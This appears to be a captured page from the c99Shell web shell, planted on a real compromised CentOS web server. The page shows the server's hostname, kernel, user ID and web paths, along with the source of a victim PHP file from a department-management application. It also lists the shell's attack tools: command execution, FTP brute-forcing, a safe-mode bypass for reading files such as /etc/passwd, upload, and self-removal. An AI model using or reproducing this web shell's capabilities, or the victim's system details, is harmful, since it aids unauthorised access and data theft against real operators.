!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processConfigDept.php (2.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsTable.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../class/clsWorkGroup.php";
include_once "../link/function.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP2 = new Department($oC);
$oDP = new Department($oC);
$oDP3 = new Department($oC);
$oWG = new workGroup($oC);

if($method=="add"){

	$maxnext=$oDP2->SearchMaxDocGroup();
	$maxdate = $oDP3->MaxDate();
	$oDP->searchdeptDate2($maxdate);
	while($oDP->GetRecord()){		
 			$oDP->Edit();
			$oDP->deptId=$oDP->deptId;
			echo "deptId=".$oDP->deptId."<br>";
			$oDP->deptName=$oDP->deptName;
			echo "deptName=".$oDP->deptName."<br>";
			$oDP->deptDesc=$oDP->deptDesc;
			//echo "deptDesc=".$oDP->deptDesc."<br>";
			$oDP->deptCode=$oDP->deptCode;
			//echo "deptCode=".$oDP->deptCode."<br>";
			$oDP->deptParent=$oDP->deptParent;
			//echo "deptParent=".$oDP->deptParent."<br>";
			$oDP->deptYear=$oDP->deptYear;
			//echo "deptYear=".$oDP->deptYear."<br>";
			$oDP->deptDate=$oDP->deptDate;
			//echo "deptDate=".$oDP->deptDate."<br>";
			$oDP->deptRef=$oDP->deptRef;
			//echo "deptRef=".$oDP->deptRef."<br>";
			$oDP->pbriId=$oDP->pbriId;
			//echo "pbriId=".$oDP->pbriId."<br>";
			if($receiveOut[$oDP->deptId]=="Y" || $sendOut[$oDP->deptId]=="Y"){
				$deptIsCenter_="Y";
			}else{
				$deptIsCenter_="N";
			}
			$oDP->deptIsCenter=$deptIsCenter_;
			echo "deptIsCenter=".$oDP->deptIsCenter."<br>";
			
			if($receiveIn[$oDP->deptId]=="Y"){ $receiveIn_="Y"; }else{ $receiveIn_="N"; };
			$oDP->receiveIn=$receiveIn_;
			echo "receiveIn=".$oDP->receiveIn."<br>";
			
			if($receiveOut[$oDP->deptId]=="Y"){ $receiveOut_="Y"; }else{ $receiveOut_="N"; };
			$oDP->receiveOut=$receiveOut_;
			echo "receiveOut=".$oDP->receiveOut."<br>";
			
			if($sendIn[$oDP->deptId]=="Y"){ $sendIn_="Y"; }else{ $sendIn_="N"; };
			$oDP->sendIn=$sendIn_;
			echo "sendIn=".$oDP->sendIn."<br>";
			
			if($sendOut[$oDP->deptId]=="Y"){ $sendOut_="Y"; }else{ $sendOut_="N"; };
			$oDP->sendOut=$sendOut_;
			echo "sendOut=".$oDP->sendOut."<br>";
			
			$oDP->deptNo=$oDP->deptNo;
			echo "deptNo=".$oDP->deptNo."<br>";
			$oDP->docGroup=($maxnext);
			echo "docGroup=".$oDP->docGroup."<br>---------------------------------------<br>";
			$oDP->Save();
	}
				
}else if($method=="edit"){
	
}else if($method=="delete"){
	$oWG->SearchBydeptIdworkGpId($depId,$workGpId);
	$oWG->GetRecord();
	$oWG->Delete();
	
}
echo "<meta http-equiv='refresh' content='0; URL=configDept.php'>";
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--